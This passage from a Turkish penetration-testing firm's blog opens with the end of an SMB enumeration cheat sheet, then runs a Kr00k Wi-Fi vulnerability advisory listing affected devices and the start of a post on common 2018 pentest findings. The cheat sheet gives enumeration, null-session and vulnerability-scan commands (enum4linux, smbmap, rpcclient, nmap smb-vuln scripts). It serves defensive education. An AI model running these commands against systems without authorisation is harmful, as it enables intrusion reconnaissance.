1em;"></a><b><span lang="TR" style="line-height: 107%;">Enum4Linux</span></b><span lang="TR" style="line-height: 107%;"> –a [ip]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in; text-align: justify; text-indent: .5in;">
<span lang="TR" style="line-height: 107%;">-a host hakkındaki
bütün(all) bilgileri toplamamıza yaramaktadır.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in; text-align: justify; text-indent: .5in;">
<span lang="TR" style="line-height: 107%;">Çıktı çok uzun olmakta,
özet olarak ifade edilirse:<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 1.5in; text-align: justify;">
<span lang="TR" style="line-height: 107%;">Nmblookup’a benzer host
çıktıları<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 1.5in; text-align: justify;">
<span lang="TR" style="line-height: 107%;">Otomatik Null oturum
kontrolü<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 1.5in; text-align: justify;">
<span lang="TR" style="line-height: 107%;">Dizinleri listeleme<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 1.5in; text-align: justify;">
<span lang="TR" style="line-height: 107%;">Domain bilgileri<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 1.5in; text-align: justify;">
<span lang="TR" style="line-height: 107%;">Password politikaları
gibi bilgiler elde edinmektedir.</span><br />
<span lang="TR" style="font-size: 12.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span>
<span lang="TR" style="font-size: 12.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br />
<div style="text-align: left;">
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="line-height: 107%;">ÖZET</span></b></div>
<span lang="TR" style="line-height: 107%;"></span><br />
<div style="text-align: left;">
<span lang="TR" style="line-height: 107%;">Hostname bilgi toplama</span></div>
<span lang="TR" style="line-height: 107%;">
</span><span lang="TR" style="line-height: 107%;"></span>
<div style="text-align: left;">
<span lang="TR" style="line-height: 107%;"><span style="mso-spacerun: yes;"> </span><b>nmblookup</b> –A [ip]</span></div>
<span lang="TR" style="line-height: 107%;">
</span><span lang="TR" style="line-height: 107%;"><div style="text-align: left;">
Dizin Listeleme</div>
</span><b><div style="text-align: left;">
<b><span lang="TR" style="line-height: 107%;">Smbmap</span></b><span lang="TR" style="line-height: 107%;"> –H [ip/hostname]</span></div>
</b><span lang="TR" style="line-height: 107%;"><div style="text-align: left;">
<b><span lang="TR" style="line-height: 107%;">Smbclient</span></b><span lang="TR" style="line-height: 107%;"> –L \\[ip]</span></div>
<o:p><div style="text-align: left;">
<b><span lang="TR" style="line-height: 107%;">Nmap</span></b><span lang="TR" style="line-height: 107%;"> –script smb-enum-shares
–p 139,445 [ip]</span></div>
</o:p></span><span lang="TR" style="line-height: 107%;"><div style="text-align: left;">
Null Oturum Kontrolü</div>
<o:p><div style="text-align: left;">
<b><span lang="TR" style="line-height: 107%;">Smbmap</span></b><span lang="TR" style="line-height: 107%;"> –H [ip/hostname]</span></div>
</o:p></span><span lang="TR" style="line-height: 107%;"><div style="text-align: left;">
<b><span lang="TR" style="line-height: 107%;">Rpcclient</span></b><span lang="TR" style="line-height: 107%;"> –U “” –n [ip]</span></div>
<o:p><div style="text-align: left;">
<b><span lang="TR" style="line-height: 107%;">Smbclient</span></b><span lang="TR" style="line-height: 107%;"> //ip/dizin_adı</span></div>
</o:p></span><span lang="TR" style="line-height: 107%;"><div style="text-align: left;">
Zafiyet kontrolü</div>
<o:p><div style="text-align: left;">
<span style="mso-spacerun: yes;"> </span><b>nmap</b> –script smb-vuln* -p 139,445 [ip]</div>
</o:p></span><span lang="TR" style="line-height: 107%;"><div style="text-align: left;">
Genel Tarama</div>
</span><span lang="TR" style="line-height: 107%;"><div style="text-align: left;">
<span style="mso-spacerun: yes;"> </span><b>enum4Linux</b> –a [ip]<br />
<br />
<span style="background-color: white; color: #222222; font-family: "arial" , "helvetica" , sans-serif; font-size: 13.2px; text-align: justify;"><a href="http://btyon.com.tr/sizma-testi.php" target="_blank">Sızma testi </a>( </span><a href="http://btyon.com.tr/pentest.php" style="color: #888888; font-family: arial, helvetica, sans-serif; font-size: 13.2px; text-align: justify; text-decoration-line: none;" target="_blank">Penetrasyon testi</a><span style="background-color: white; color: #222222; font-family: "arial" , "helvetica" , sans-serif; font-size: 13.2px; text-align: justify;">) hizmetlerimiz hakkında detaylı bilgi almak için </span><a href="http://btyon.com.tr/sizma-testi.php" style="color: #888888; font-family: arial, helvetica, sans-serif; font-size: 13.2px; text-align: justify; text-decoration-line: none;" target="_blank">tıklayınız</a><span style="background-color: white; color: #222222; font-family: "arial" , "helvetica" , sans-serif; font-size: 13.2px; text-align: justify;">. </span></div>
</span></div>
<div class="MsoNormal" style="margin-left: 1.0in; text-align: justify;">
<a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a></div>
<div class="MsoNormal" style="margin-left: .5in; text-align: justify;">
<a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a></div>
Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-65544765631235281862020-03-10T17:58:00.001+03:002020-03-31T16:02:21.120+03:00Kr00k Nedir, Tehlikeleri Nelerdir?<br />
<h2 style="line-height: 150%; text-align: center;">
<b><span style="line-height: 150%;"><span style="font-size: x-large;">Kr00k Nedir, Tehlikeleri
Nelerdir?</span></span></b></h2>
<div class="MsoNormal" style="line-height: 150%; text-align: right;">
<span style="line-height: 150%;"><b>Kübra Eskalan, Sızma Testi Uzmanı</b></span></div>
<div class="MsoNormal" style="line-height: 150%; text-align: right;">
<span style="line-height: 150%;"><b><br /></b></span></div>
<div class="MsoNormal" style="line-height: 150%; text-align: justify;">
<span style="background: white; color: black; font-size: 12.0pt; line-height: 150%;">Kr00k-CVE-2019-15126, ESET güvenlik şirketi
tarafından 17 Ağustos 2019’da keşfedilmiştir. 24-28 Şubat 2020 tarihide
gerçekleşen RSA 2020 etkinliğinde güvenlik ürünleri geliştiricisi olan ESET
firmasın araştırmacıların yaptığı sunum ile detayları açıklanmıştır. Bu açıklık
şifreli Wi-Fi trafiğinin şifresinin çözülmesine izin veren bir güvenlik
açığıdır. Aslında herkesin kullandığı yazılımlarda her gün keşfedilen birçok
hata gibi bir hatadır. Aradaki fark ise, Kr00k'un bir Wi-Fi bağlantısı
üzerinden gönderilen veri paketlerini korumak için kullanılan şifrelemeyi
etkilemesidir. Çoğunluk ile bu paketler kullanıcının Wi-Fi şifresine bağlı
benzersiz bir anahtarla şifrelenir. Çok sayıda iOS ve Android cihaz da bu
donanımla kullanıcılarla buluştuğu için tehlike içinde olduğu belirlenmiştir.
Üstelik sadece akıllı telefonlar değil, ASUS ve Huawei tarafından üretilen
Wi-Fi cihazlarının da bu anteni kullandığı bilinmektedir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 150%; text-align: justify;">
<span style="background: white; color: black; font-size: 12.0pt; line-height: 150%;">Broadcom üretimi Wi-Fi antenlerinde bu güvenlik
açığı keşfedilip, istismar edilerek kullanıcıların şifrelenmiş verilerinin
kolayca okunabildiği fark edilmiştir. En yaygın kullanılan protokoller arasında
yer alan WPA2-Personal ve WPA2-Enterprise zafiyetten etkilenmektedir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 150%; text-align: justify;">
<span style="color: black; font-size: 12.0pt; line-height: 150%;">Bu konuyu daha teknik ifade edecek olursak, kablosuz haberleşmenin
doğasında<span style="mso-spacerun: yes;"> </span>bulunan <span style="mso-spacerun: yes;"> </span>“Bağlantıyı kesmek” veya ”</span><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"> </span><span style="color: black; font-size: 12.0pt; line-height: 150%;">Deauthentication” durumu bir Wi-Fi bağlantısında doğal olarak gerçekleşen olaydır.
Bu durum genellikle düşük Wi-Fi sinyali alındığında otomatik olarak
gerçekleşerek bağlantı kesme durumu meydana gelir. Wi-Fi cihazlarının gün
boyunca birkaç kez bağlantısı kesilir ve bu durum yaşandığında, istemciler geçmişte
kullanılan ağa yeniden bağlanmak için otomatik olarak talep iletir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 150%; text-align: justify;">
<span style="color: black; font-size: 12.0pt; line-height: 150%;">ESET araştırmacıları, saldırganların; aygıtları uzun bir bağlantı kesme
durumuna sokabileceklerini ve bu sayede aygıta gelmesi beklenen Wi-Fi
paketlerini dinleyebileceklerini ve daha sonra gerçekleşen trafiği deşifre
etmek için Kr00k açıklığını kullanabileceklerini belirtmişlerdir. Bu işlemlerin
gerçekleşmesiyle normalde güvenli olduğu düşünülen trafik, saldırganlar
tarafından okunabilir hale gelmektedir.<span style="background: white;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="line-height: 150%; text-align: justify;">
<span style="background: white; color: black; font-size: 12.0pt; line-height: 150%;">Bu açıklıkta dikkat edilmesi gereken en önemli nokta
ise kr00k açıklığının sadece AES-CCMP şifrelemeli WPA2-Personal veya WPA2-Enterprise
güvenlik protokollerini kullanan WiFi bağlantılarını etkilemesidir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 150%; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: 150%; text-align: justify;">
<b><span style="background: white; color: black; font-size: 18.0pt; line-height: 150%;">Kimler Etkilendi, Ne Yapılmalı?<o:p></o:p></span></b></div>
<div class="MsoNormal" style="background: white; line-height: 150%; margin-bottom: 6.0pt; margin-left: 0cm; margin-right: 0cm; margin-top: 6.0pt; text-align: justify;">
<span style="color: black; font-size: 12.0pt; line-height: 150%;">ESET araştırmacıları
tarafından, birçok popüler cihazın savunmasız olduğu doğrulanmıştır. </span><span style="background: white; color: black; font-size: 12.0pt; line-height: 150%;">Araştırma sonuçlarına göre kr00k, henüz
yamalanmamış olan Broadcom ve Cypress Wi-Fi çiplerini kullanan tüm cihazlar bu
açıklıktan etkilenmektedir. Bu cihazlara akıllı telefonlar, tabletler,
dizüstü bilgisayarlar örnek gösterilebilir. Ayrıca bu güvenlik açığından
yalnızca istemci aygıtları değil, Wi-Fi erişim noktaları ve yönlendiricileri de
etkilenmiştir.<o:p></o:p></span></div>
<div class="MsoNormal" style="background: white; line-height: 150%; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="color: black; font-size: 12.0pt; line-height: 150%;">Bilinen savunmasız cihazlardan
bazıları şunlardır:<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpFirst" style="background: white; line-height: 150%; margin-bottom: 1.2pt; margin-left: 37.2pt; mso-add-space: auto; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="color: black; font-family: "symbol"; font-size: 12.0pt; line-height: 150%;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-GB" style="color: black; mso-color-alt: windowtext;"><span lang="TR" style="color: black; font-size: 12.0pt; line-height: 150%; text-decoration: none;">Amazon
Echo</span></span><span style="color: black; font-size: 12.0pt; line-height: 150%;"> 2. nesil<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="background: white; line-height: 150%; margin-bottom: 1.2pt; margin-left: 37.2pt; mso-add-space: auto; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="color: black; font-family: "symbol"; font-size: 12.0pt; line-height: 150%;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-GB" style="color: black; mso-color-alt: windowtext;"><span lang="TR" style="color: black; font-size: 12.0pt; line-height: 150%; text-decoration: none;">Amazon
Kindle</span></span><span style="color: black; font-size: 12.0pt; line-height: 150%;"> 8. nesil<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="background: white; line-height: 150%; margin-bottom: 1.2pt; margin-left: 37.2pt; mso-add-space: auto; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="color: black; font-family: "symbol"; font-size: 12.0pt; line-height: 150%;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-GB" style="color: black; mso-color-alt: windowtext;"><span lang="TR" style="color: black; font-size: 12.0pt; line-height: 150%; text-decoration: none;">Apple iPad mini 2</span></span><span style="color: black; font-size: 12.0pt; line-height: 150%;"><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="background: white; line-height: 150%; margin-bottom: 1.2pt; margin-left: 37.2pt; mso-add-space: auto; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="color: black; font-family: "symbol"; font-size: 12.0pt; line-height: 150%;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-GB" style="color: black; mso-color-alt: windowtext;"><span lang="TR" style="color: black; font-size: 12.0pt; line-height: 150%; text-decoration: none;">Apple
iPhone 6</span></span><span style="color: black; font-size: 12.0pt; line-height: 150%;"> , </span><span lang="EN-GB" style="color: black; mso-color-alt: windowtext;"><a href="https://en.wikipedia.org/wiki/IPhone_6S" title="İPhone 6S"><span lang="TR" style="color: black; font-size: 12.0pt; line-height: 150%; text-decoration: none;">6S</span></a></span><span style="color: black; font-size: 12.0pt; line-height: 150%;"> , </span><span lang="EN-GB" style="color: black; mso-color-alt: windowtext;"><a href="https://en.wikipedia.org/wiki/IPhone_8" title="İPhone 8"><span lang="TR" style="color: black; font-size: 12.0pt; line-height: 150%; text-decoration: none;">8</span></a></span><span style="color: black; font-size: 12.0pt; line-height: 150%;"> , </span><span lang="EN-GB" style="color: black; mso-color-alt: windowtext;"><a href="https://en.wikipedia.org/wiki/IPhone_XR" title="İPhone XR"><span lang="TR" style="color: black; font-size: 12.0pt; line-height: 150%; text-decoration: none;">XR</span></a></span><span style="color: black; font-size: 12.0pt; line-height: 150%;"><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="background: white; line-height: 150%; margin-bottom: 1.2pt; margin-left: 37.2pt; mso-add-space: auto; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="color: black; font-family: "symbol"; font-size: 12.0pt; line-height: 150%;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-GB" style="color: black; mso-color-alt: windowtext;"><span lang="TR" style="color: black; font-size: 12.0pt; line-height: 150%; text-decoration: none;">Apple MacBook Air Retina</span></span><span style="color: black; font-size: 12.0pt; line-height: 150%;"> 13
inç 2018<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="background: white; line-height: 150%; margin-bottom: 1.2pt; margin-left: 37.2pt; mso-add-space: auto; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="color: black; font-family: "symbol"; font-size: 12.0pt; line-height: 150%;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-GB" style="color: black; mso-color-alt: windowtext;"><span lang="TR" style="color: black; font-size: 12.0pt; line-height: 150%; text-decoration: none;">Google
Nexus 5</span></span><span style="color: black; font-size: 12.0pt; line-height: 150%;"><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="background: white; line-height: 150%; margin-bottom: 1.2pt; margin-left: 37.2pt; mso-add-space: auto; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="color: black; font-family: "symbol"; font-size: 12.0pt; line-height: 150%;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-GB" style="color: black; mso-color-alt: windowtext;"><span lang="TR" style="color: black; font-size: 12.0pt; line-height: 150%; text-decoration: none;">Google
Nexus 6</span></span><span style="color: black; font-size: 12.0pt; line-height: 150%;"><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="background: white; line-height: 150%; margin-bottom: 1.2pt; margin-left: 37.2pt; mso-add-space: auto; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="color: black; font-family: "symbol"; font-size: 12.0pt; line-height: 150%;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-GB" style="color: black; mso-color-alt: windowtext;"><span lang="TR" style="color: black; font-size: 12.0pt; line-height: 150%; text-decoration: none;">Google Nexus 6S</span></span><span style="color: black; font-size: 12.0pt; line-height: 150%;"><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="background: white; line-height: 150%; margin-bottom: 1.2pt; margin-left: 37.2pt; mso-add-space: auto; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="color: black; font-family: "symbol"; font-size: 12.0pt; line-height: 150%;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-GB" style="color: black; mso-color-alt: windowtext;"><span lang="TR" style="color: black; font-size: 12.0pt; line-height: 150%; text-decoration: none;">Samsung Galaxy S4 GT-I9505</span></span><span style="color: black; font-size: 12.0pt; line-height: 150%;"><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="background: white; line-height: 150%; margin-bottom: 1.2pt; margin-left: 37.2pt; mso-add-space: auto; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="color: black; font-family: "symbol"; font-size: 12.0pt; line-height: 150%;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-GB" style="color: black; mso-color-alt: windowtext;"><span lang="TR" style="color: black; font-size: 12.0pt; line-height: 150%; text-decoration: none;">Samsung
Galaxy S8</span></span><span style="color: black; font-size: 12.0pt; line-height: 150%;"><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="background: white; line-height: 150%; margin-bottom: 1.2pt; margin-left: 37.2pt; mso-add-space: auto; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="color: black; font-family: "symbol"; font-size: 12.0pt; line-height: 150%;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-GB" style="color: black; mso-color-alt: windowtext;"><span lang="TR" style="color: black; font-size: 12.0pt; line-height: 150%; text-decoration: none;">Xiaomi Redmi 3S</span></span><span style="color: black; font-size: 12.0pt; line-height: 150%;"><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpLast" style="background: white; line-height: 150%; margin-bottom: 1.2pt; margin-left: 37.2pt; mso-add-space: auto; mso-margin-top-alt: auto; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: 150%; text-align: justify;">
<span style="color: black; font-size: 12.0pt; line-height: 150%;">Firmalar ise bu güvenlik açığını kapatmak için yamalar yayınlamaktadırlar. ESET’in
yayınladığı raporda diğer markalar tarafından üretilen Wi-Fi donanımlarında da
zafiyet araması yapıldığı ve Qualcomm, Realtek, Ralink, Mediatek donanımlarında
herhangi bir zafiyet bulunmadığı belirtilmiştir. <o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 150%; text-align: justify;">
<span style="background: white; color: black; font-size: 12.0pt; line-height: 150%;">Bu güvenlik açığından korunabilmek adına telefonlar,
tabletler, dizüstü bilgisayarlar, Wi-Fi erişim noktaları ve yönlendiriciler
dahil olmak üzere tüm Wi-Fi özellikli cihazların en son işletim sistemi,
yazılım ve / veya ürün yazılımı sürümlerine güncellendiğinden emin olunması önerilmektedir<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 150%; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: 150%; text-align: justify;">
<span style="background-color: white; font-family: arial, helvetica, sans-serif;">Wifi kablosuz ağ güvenlik testini de içeren </span><a href="http://btyon.com.tr/sizma-testi.php" style="font-family: arial, helvetica, sans-serif;" target="_blank">sızma testi</a><span style="background-color: white; font-family: arial, helvetica, sans-serif;"> ( </span><a href="http://www.btyon.com.tr/penetrasyon-testi.php" style="font-family: arial, helvetica, sans-serif;" target="_blank">Penetrasyon testi</a><span style="background-color: white; font-family: arial, helvetica, sans-serif;">) hizmetlerimiz hakkında detaylı bilgi almak için </span><a href="http://www.btyon.com.tr/pentest.php" style="font-family: arial, helvetica, sans-serif;" target="_blank">tıklayınız</a><span style="background-color: white; font-family: arial, helvetica, sans-serif;">. </span><br />
<span style="background-color: white; font-family: arial, helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: 150%; text-align: justify;">
<b><span style="background: white; color: black; font-size: 12.0pt; line-height: 150%;">Kaynaklar<o:p></o:p></span></b></div>
<div class="MsoNormal" style="line-height: 150%; text-align: justify;">
<span lang="EN-GB"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;">https://en.wikipedia.org/wiki/Kr00k</span></span><span lang="EN-GB" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 150%; text-align: justify;">
<span lang="EN-GB"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;">https://www.eset.com/tr/kr00k/</span></span><span class="MsoHyperlink"><span lang="EN-GB" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><o:p></o:p></span></span></div>
<br />Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-14799931620771800122019-02-05T15:24:00.000+03:002020-03-31T16:03:22.262+03:00<h2 style="text-align: center;">
SIZMA TESTLERİNDE EN ÇOK KARŞILAŞTIĞIMIZ AÇIKLIKLAR «2018» </h2>
<div>
<br /></div>
<div style="text-align: right;">
<b>Kemal AYDIN, Kıdemli Sızma Testi Uzmanı [TSE]</b></div>
<div style="text-align: right;">
<b><br /></b></div>
<div style="text-align: justify;">
Teknolojinin gelişmesi ile beraber hayatımızı teknoloji ile beraber şekillendirmekteyiz. Teknolojide ortaya çıkan değişiklikler insanların yaşam ve iş rutinlerini değiştirmek için motivasyon sağlamaktadır. Örneğin internet üzerinden alışveriş yapmak, yemek siparişi vermek, ofise gitmeden uzaktan çalışmak gibi durumlar hayatı kolaylaştırmakta ve benzer durumlar hayatın her alanında karşımıza çıkmaktadır. Hayatımıza “akıllı” kavramının girmesiyle beraber hayat kalitemizin arttığı yadsınamaz bir gerçektir. Ancak bu akıllı cihazlar herkes tarafından kolay kullanılabilir olması ve kolay kurulum yapılabilmesi adına en düşük güvenlik önlemleri ile karşımıza gelmektedir. Son kullanıcı bu noktada birçok şeyden habersiz bu ürünleri kullanmaya devam etmektedir. Bu durum kişilerin ve kurumların mahremiyetini ve güvenliğini tehlikeye atmaktadır.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Kısaca, bir şey insanların hayatını ne kadar kolaylaştırıyor ise o ölçüde güvenliğini tehdit etmektedir. Aynı durum kurumlar için de fazlasıyla geçerlidir. Örneğin kurumlar çalışanlarına esnek çalışma ortamı sağlayabilmek adına VPN teknolojisi ile çalışanlarını kendi kurum ağına dahil edebilmektedir. Ancak burada gerekli güvenlik tedbirleri alınmaz ise kurumlar için büyük risk oluşturacaktır. Bunun gibi örnekler çoğaltılabilir. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Sızma testleri bir kurumun, bilgi teknoloji sistemlerine bir saldırgan bakış açısıyla sızma girişimleri için yapılan testlerdir. Sızma testinde belli senaryolar dahilinde testler gerçekleştirilir. Saldırganın kurum çalışanı olması (içeriden yapılan saldırı) veya saldırganın kurum ağına gerçekleştirmiş olduğu fiziksel erişim gibi senaryolar bunlara örnek olarak verilebilir. Dışarıdan içeriye sızmalarda ise sosyal mühendislik testleri büyük önem taşımaktadır. Oltalama testleri bu yapıda önemli bir paydaya sahiptir. Bu vektörler dışında web ve mobil uygulamalar üzerinden de hem sistem hem de sistemde kayıtlı kişilere ait bilgiler ele geçirebilmektedir. Güvenliğiniz en zayıf halkanız ile doğru orantılı olacağı için tüm erişim noktalarından uygun testlerin yapılması, kurumların siber uzayda güvenlik seviyesinin farkında olması adına çok önemlidir. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Biz de BTYÖN olarak 2018 yılında yaptığımız testlerde en çok karşılaştığımız bulguları derleyip paylaşmak istedik. Bu sayede kurumların kendi sistemlerinde bu zafiyetlerin bulunup bulunmadığını test edebileceğine inanmaktayız. Böylelikle kurumlar sistemlerini daha güvenliği hale getirip saldırı tehditlerini azaltabileceklerdir.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Yaptığımız analizi paylaşmadan önce yapılan testlerin içerikleri hakkında bilgi vermek faydalı olacaktır. </div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
1. AĞ VE SİSTEM ALTYAPILARI TESTLERİ</h3>
<h4 style="text-align: justify;">
1.1. DIŞ AĞ & DMZ TESTLERİ</h4>
<div style="text-align: justify;">
İnternet üzerinden gerçekleştirilen güvenlik denetimlerde kuruma ait ve dış dünyaya açık olan sistemlerin güvenlik denetimleri gerçekleştirilmektedir. Gerçekleştirilen denetimlerin bir kısmı aşağıda verilmiştir.</div>
<div style="text-align: justify;">
</div>
<ul>
<li> Müşteri sistemlerine ait pasif bilgi toplama yöntemleri ile kurum hakkında bilgi toplanır.</li>
<li> Hedef sistemler üzerinde çalışan servisler, sürümleri ve bu sürümlere ait zafiyetler tespit edilir.</li>
<li> Hedef sistemler üzerinde bulunan servislerin hatalı yapılandırılmalarına bağlı zafiyetler tespit edilir.</li>
<li>Tespit edilen bütün zafiyetler istismar edilerek kanıtlar toplanır, hedef sistemlerde erişim elde edilmeye çalışılır ve elde edilen erişimlerin yetkileri yükseltilmeye çalışılır.</li>
</ul>
<br />
<h4 style="text-align: justify;">
